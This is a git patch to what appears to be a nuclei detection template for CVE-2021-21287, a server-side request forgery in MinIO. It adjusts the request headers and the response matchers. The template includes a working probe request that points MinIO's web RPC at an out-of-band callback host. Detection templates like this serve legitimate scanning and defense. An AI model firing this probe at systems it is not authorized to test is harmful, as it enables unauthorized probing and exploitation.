From 6e5255514dd0e04898a266dbb4f5a772d44a8891 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 20:47:58 +0530 Subject: [PATCH] misc update --- cves/2021/CVE-2021-21287.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-21287.yaml b/cves/2021/CVE-2021-21287.yaml index 7f5e188f12..030ce0d427 100644 --- a/cves/2021/CVE-2021-21287.yaml +++ b/cves/2021/CVE-2021-21287.yaml @@ -17,16 +17,18 @@ requests: POST /minio/webrpc HTTP/1.1 Host: {{interactsh-url}} Content-Type: application/json + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Length: 76 {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: - - "http" # Confirms the HTTP Interaction \ No newline at end of file + - "http" # Confirms the HTTP Interaction + + - type: word + words: + - "We encountered an internal error" \ No newline at end of file